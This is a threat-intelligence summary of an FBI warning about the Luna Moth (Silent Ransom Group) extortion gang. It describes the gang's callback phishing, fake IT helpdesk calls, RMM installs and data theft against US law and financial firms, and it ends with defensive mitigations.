Full Report
The FBI warned that an extortion gang known as the Silent Ransom Group has been targeting U.S. law firms over the last two years in callback phishing and social engineering attacks. [...]
Analysis Summary
# Threat Actor: Luna Moth (Also associated with Silent Ransom Group - SRG)
## Attribution & Identity
The threat actor is identified by the FBI as "Luna Moth," and they are associated with the extortion activities known as the Silent Ransom Group (SRG). The group utilizes extortion tactics against targeted organizations.
## Activity Summary
Luna Moth/SRG conducts extortion attacks primarily targeting US-based law firms and financial services firms. Their primary initial access method involves sophisticated social engineering:
1. **Domain Impersonation:** Registering domains using typosquatting patterns to impersonate IT helpdesk or support portals for major US law firms and financial services firms.
2. **Malicious Contact:** Sending malicious phishing emails that include fake IT helpdesk phone numbers, urging victims to call to resolve non-existent technical issues.
3. **RMM Installation:** When employees call the fake help desk, the attackers, impersonating IT staff, trick the targeted employees into installing Remote Monitoring & Management (RMM) software from fraudulent IT help desk websites.
4. **Data Exfiltration & Extortion:** After gaining hands-on keyboard access via the RMM tool, they search for sensitive documents, exfiltrate the data, and then use ransom emails threatening disclosure or sale of the data. They also reportedly call employees to pressure them during negotiations. Ransom demands range from one to eight million USD.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** Social engineering via phishing emails impersonating IT support, directing victims to call fake support numbers.
- **Execution/Persistence:** Tricking victims into installing Remote Monitoring & Management (RMM) software.
- **Lateral Movement/Privilege:** The attack involves minimal privilege escalation.
- **Exfiltration:** Data exfiltration conducted using WinSCP (Windows Secure Copy) or a hidden/renamed version of Rclone.
- **Impact:** Extortion via threats of data publication/sale, coupled with direct pressure calls to employees.
- *Specific MITRE ATT&CK references were not provided in the text snippet.*
## Targeting
- **Sectors:** Law firms and financial services firms.
- **Geography:** United States firms.
- **Victims:** US law firms and financial services firms (specific organizations were not named).
## Tools & Infrastructure
- **Malware families used:** Remote Monitoring & Management (RMM) software (method of gaining initial access post-social engineering).
- **Infrastructure (C2, domains, IPs):** Attackers register domains using typosquatting patterns to impersonate legitimate IT support portals. (No specific IPs or defanged URLs were provided in the summary text).
## Implications
Luna Moth (SRG) represents a significant threat to regulated sectors like legal and finance due to their highly personalized, multi-vector social engineering approach (email and phone calls) to bypass standard email filtering by focusing on compelling one-on-one interaction for RMM installation. Their success hinges on exploiting basic employee trust in internal IT support structures.
## Mitigations
- Utilize robust passwords.
- Enable two-factor authentication (2FA) for all employee accounts.
- Ensure regular data backups are performed.
- Conduct mandatory staff training on detecting phishing attempts, specifically focusing on verifying legitimacy when contacted by "IT Support" via unexpected channels or phone numbers.